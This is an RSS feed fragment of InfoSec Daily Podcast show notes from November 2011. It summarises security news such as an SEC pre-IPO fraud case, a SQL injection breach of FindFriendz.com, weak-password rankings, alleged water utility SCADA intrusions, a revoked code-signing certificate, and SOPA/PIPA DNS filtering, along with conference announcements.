<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The SEC alleges that Florida resident John Mattera and others set up a new hedge fund named The Praetorian Global Fund. The Commission alleged that the suspects had claimed to potential investors that they, and other entities, had tens of millions of dollars worth of shares in the tech firms before their initial public offering.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mattera and his partners Brad Van Siclen, David Howard, Joseph Almazon and John Arnold, allegedly encouraged the investors to part with their cash to be put into an escrow fund to purchase the shares when the time came, and the SEC said they had managed to bag $12m from investors all over the US in the last 15 months.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to the SEC, none of the individuals ever had any shares in the companies, which also included firms like Bloom Energy and Fisker Auto. The money that was supposed to be going into escrow was actually just going into the personal accounts of Mattera and Arnold, the SEC said.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Commission asserted that after Arnold had taken his cut, Mattera then grabbed the rest of the dosh to &quot;afford his lavish personal expenses&quot; and to pay the rest of the gang.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;By conjuring up a seemingly prestigious hedge fund and touting the safety of an escrow agent, these men exploited investors&rsquo; desire to get an inside track on a wave of hyped future IPOs,&rdquo; George Canellos, director of the SEC&rsquo;s New York office, said in a canned statement.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Even as investors believed their funds were sitting safely in escrow accounts, Mattera plundered those accounts to bankroll a lifestyle of private jets, luxury cars, and fine art.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The US attorney&#39;s office for the southern district of New York, which was carrying on a parallel investigation, has now filed criminal charges against Mattera and arrested him.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The SEC is now looking for the courts to freeze the assets of all five men and eight different corporate entities listed in the</span><a href="http://www.sec.gov/litigation/complaints/2011/comp22160.pdf"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">complaint (PDF)</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source(s): &nbsp;</span><a href="http://datalossdb.org/incidents/4985-57-721-usernames-and-clear-text-passwords-acquired-by-hacker-and-posted-on-internet"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://datalossdb.org/incidents/4985-57-721-usernames-and-clear-text-passwords-acquired-by-hacker-and-posted-on-internet</span></a><br />
	<a href="http://www.ehackingnews.com/2011/11/social-network-site-findfriendzcom.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.ehackingnews.com/2011/11/social-network-site-findfriendzcom.html</span></a><br />
	<a href="http://pastebin.com/uqwXcN1F"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://pastebin.com/uqwXcN1F</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Member of t34m t!g3R Hackers team,An0nym0us sn3Ak3r hacked the social networking site FindFriendz.com using the SQL injection vulnerability(one of the top web application vulnerability). </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">He compromised the 57000+ users data includes username and password. &nbsp;He leaked the part of database in pastebin.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pastebin leak: </span><a href="http://pastebin.com/uqwXcN1F"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://pastebin.com/uqwXcN1F</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://mashable.com/2011/11/17/worst-internet-passwords/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://mashable.com/2011/11/17/worst-internet-passwords/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pro tip: choosing &ldquo;password&rdquo; as your online password is not a good idea. In fact, unless you&rsquo;re hoping to be an easy target for hackers, it&rsquo;s the worst password you can possibly choose.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Password&rdquo; ranks first on password management application provider SplashData&rsquo;s annual list of worst internet passwords, which are ordered by how common they are. (&ldquo;Passw0rd,&rdquo; with a numeral zero, isn&rsquo;t much smarter, ranking 18th on the list.)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The list is somewhat predictable: Sequences of adjacent numbers or letters on the keyboard, such as &ldquo;qwerty&rdquo; and &ldquo;123456,&rdquo; and popular names, such as &ldquo;ashley&rdquo; and &ldquo;michael,&rdquo; all are common choices. Other common choices, such as &ldquo;monkey&rdquo; and &ldquo;shadow,&rdquo; are harder to explain. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Extra Bonus</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: Idiots on twitter have been giving away passwords left and right all day &#8211; </span><a href="https://twitter.com/#%21/search?q=%23worstpassword"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://twitter.com/#!/search?q=%23worstpassword</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.infoworld.com/t/network-security/us-water-plants-reportedly-hit-cyber-attacks-179456"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.infoworld.com/t/network-security/us-water-plants-reportedly-hit-cyber-attacks-179456</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In separate incidents, hackers allegedly caused a water pump failure at an Illinois utility and showed off purported access to water supply systems for South Houston, NV.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Two events this week may change that perception.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On Thursday, a control-systems expert</span><a href="http://community.controlglobal.com/content/water-system-hack-%E2%80%93-system-broken"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">released details of an intrusion</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> into a utility company&#39;s control network that lasted at least two months and resulted in damage to a water pump. In a statement, the U.S. Department of Homeland Security inadvertently identified the location of the utility company as Springfield, Ill. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;This isn&#39;t hypothetical any more, where people write about what could and what may happen,&quot; said Joseph Weiss, a managing partner at Applied Control Solutions and the person who released details from the report. &quot;This keeps going back to what somebody has done. We don&#39;t know what is going on and there is no guidance out there yet. The concern is how many others have been compromised.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">However, City Water, Light &amp; Power, the utility provider for the city, denied that it was the target of the attack. &quot;Various reports have falsely identified City Water, Light and Power in Springfield, Ill., as having experienced a cyber security breach,&quot; the company said in a statement. &quot;CWLP has not had any breach of its Water or Electric Department supervisory control and data acquisition (SCADA) systems.&quot; SCADA is the computer control network that operates various systems at the utility.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Whether or not CWLP is the breached utility firm, attacks on critical-infrastructure companies appear to be a trend. Today, a hacker posted images and details purportedly from the systems that control the water supply for the city of South Houston, Texas. A series of five images shows the various water levels at different pumping stations and appears to indicate the user has the ability to enable and disable equipment.</span><br />
	<img height="300px;" src="https://lh5.googleusercontent.com/WFLXt0BW9rTXVk4YcFpifSz_Ozlmvj7yrKU1Wt8jyQocl9D_wXvWlURSoo9Hh_vysne4k7iJRyzPiWhtvIghkVWCkj9Hx1cb7t7R3RP-L0Kn-w-zxtI" width="400px;" /></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.h-online.com/security/news/item/Compromised-certificates-Revocations-alone-are-insufficient-1381001.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.h-online.com/security/news/item/Compromised-certificates-Revocations-alone-are-insufficient-1381001.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Revoking a digital certificate does not automatically invalidate, for instance, software signatures that have been made with this certificate. What matters is the revocation date, which determines the point in time after which a signature will no longer be validated.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to a</span><a href="http://blogs.norman.com/2011/malware-detection-team/invisible-ynk-a-code-signing-conundrum"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">report</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> from anti-virus specialist</span><a href="http://www.norman.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Norman</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, the signatures of several recently discovered trojans were validated by Windows as a result, and no warning was issued before installing the malware. The trojans were signed with a key that had been stolen from a Japanese company. The corresponding certificate was reported as compromised on 29 July 2011 and revoked by its issuing Certificate Authority (CA), VeriSign, which is now part of Symantec. However, that date was also entered as the revocation date.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unfortunately, the trojans were signed with the key on 13 April 2010, 3 July 2010, and 22 January 2011 &ndash; long before the revocation date. Because of this, the signature code remained valid for the older signatures, and systems would only invalidate signatures that were made after the revocation date.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.techdirt.com/articles/20111118/03163416812/sandia-national-labs-dns-filtering-sopapipa-wont-stop-piracy-will-hurt-online-security.shtml"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.techdirt.com/articles/20111118/03163416812/sandia-national-labs-dns-filtering-sopapipa-wont-stop-piracy-will-hurt-online-security.shtml</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sandia National Labs: DNS Filtering In SOPA/PIPA Won&#39;t Stop Piracy, But Will Hurt Online Security from the </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">more-experts-weigh-in</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> dept</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We&#39;ve covered at great length the problems with DNS filtering in SOPA and PROTECT IP (PIPA) and how it will harm internet security. These concerns were first highlighted by a group of folks who are considered to be some of the foremost experts (and original architects) on DNS. The MPAA and other SOPA/PIPA startups have been trying for months to diminish these points, but have yet to find any kind of argument that makes sense. The argument they fall back on is &quot;well, if this law breaks DNSSEC, just change the code and fix it.&quot; This represents a fundamental misunderstanding of the technoloy. That&#39;s not too surprising, coming from the MPAA, frankly. However, now, Sandia National Labs, which is a part of the Department of Energy, has sent a letter to Rep. Zoe Lofgren confirming most of the problems with the idea of DNS filtering, noting that it would make the internet less secure&#8230; and would do nothing to actually stop piracy.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">It is not likely DNS filtering would be effective in blocking U.S. access to targeted foreign websites&#8230;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On the question of DNSSEC, the letter notes that slowing the adoption of DNSSEC would have significant &quot;negative consequences&quot; for US online security. While DNSSEC may not be fully rolled out yet, nearly everyone who understands this stuff knows that it&#39;s needed to fix key flaws in DNS. And while it takes time, simply breaking it and waiting for the next generation to rewrite it from scratch would be a mistake. Many years of careful work has gone into DNSSEC. Scrapping it for something else random is not going to help.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">At this point, I don&#39;t see how any SOPA/PIPA supporters can still claim that the concerns over DNS blocking are unfounded. When you even have a major national lab saying that it&#39;s a bad idea, won&#39;t work and will be bad for online security&#8230; can the MPAA still respond with nothing more detailed than &quot;we disagree&quot; (which was the MPAA&#39;s actual statement at the hearing when challenged about the security problems associated with DNS blocking).</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-526-pre-ipo-bust-who-is-michael-findfriendz-com-water-plants-attacked-compromised-certs-sopa/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3171/0/infosec-daily-podcast-episode-526.mp3" length="18427756" type="audio/mpeg" />
		<itunes:duration>0:38:20</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 526 for November 18, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Geordy Rostad.
	Announcements:
	Brad Smith (theNurse) and his stroke at Hacker Halted:
	We all know and love Brad Smith[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 526 for November 18, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Geordy Rostad.
	Announcements:
	Brad Smith (theNurse) and his stroke at Hacker Halted:
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Vote For Wim Remes
	When: Starts November 16, 2011
	Where: ISC2
	Who: CISSP&#8217;s
	http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	DerbyCon 2012 &#8211; &#34;The Reunion&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: http://www.theregister.co.uk/2011/11/18/pre_ipo_share_scam_facebook_twitter/
	The US Securities and Exchange Commission has closed down an investment scam that was touting pre-IPO shares in Facebook, Twitter, Zynga and Groupon.
	The SEC alleges that Florida resident John Mattera and others set up a new hedge fund named The Praetorian Global Fund. The Commission alleged that the suspects had claimed to potential investors that they, and other entities, had tens of millions of dollars worth of shares in the tech firms before their initial public offering.
	Mattera and his partners Brad Van Siclen, David Howard, Joseph Almazon and John Arnold, allegedly encouraged the investors to part with their cash to be put into an escrow fund to purchase the shares when the time came, and the SEC said they had managed to bag $12m from investors all over the US in the last 15 months.
	According to the SEC, none of the individuals ever had any shares in the companies, which also included firms like Bloom Energy and Fisker Auto. The money that was supposed to be going into escrow was actually just going into the personal accounts of Mattera and Arnold, the SEC said.
	The Commission asserted that after Arnold had taken his cut, Mattera then grabbed the rest of the dosh to &#34;afford his lavish personal expenses&#34; and to pay the rest of the gang.
	&#8220;By conjuring up a seemingly prestigious hedge fund and touting the safety of an escrow agent, these men exploited investors&#8217; desire to get an inside track on a wave of hyped future IPOs,&#8221; George Canellos, director of the SEC&#8217;s New York office, said in a canned statement.
	&#8220;Even as investors believed their funds were sitting safely in escrow accounts, Mattera plundered those accounts to bankroll a lifestyle of private jets, luxury cars, and fine art.&#8221;
	The US attorney&#39;s office for the southern district of New York, which was carrying on a parallel investigation, has now filed criminal charges against Mattera and arrested him.
	The SEC is now looking for the courts to freeze the assets of all five men and eight different corporate entities listed in the complaint (PDF).
	Source(s): &#160;http://datalossdb.org/incidents/4985-57-721-usernames-and-clear-text-passwords-acquired-by-hacker-and-posted-on-internet
	http://www.ehackingnews.com/2011/11/social-network-site-findfriendzcom.html
	http://pastebin.com/uqw[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 525 &#8211; UnexplodedSecurityBombs, Win8 Bootkit,  The Rootkit of All Evil &amp; Illegal White Lies</title>
		<link>http://www.isdpodcast.com/episode-525-unexplodedsecuritybombs-win8-bootkit-the-rootkit-of-all-evil-illegal-white-lies</link>
		<comments>http://www.isdpodcast.com/episode-525-unexplodedsecuritybombs-win8-bootkit-the-rootkit-of-all-evil-illegal-white-lies#comments</comments>
		<pubDate>Fri, 18 Nov 2011 01:50:04 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3167</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 525 for November 17, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, Karthik Rangarajan, and Varun Sharma. Announcements: Brad Smith (theNurse) and his stroke at Hacker Halted: We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 525 for November 17, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, Karthik Rangarajan, and Varun Sharma.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse) and his stroke at Hacker Halted:</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vote For Wim Remes</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 16, 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: ISC2</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Who: CISSP&rsquo;s</span><br />
	<a href="http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;The Reunion&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span><br />
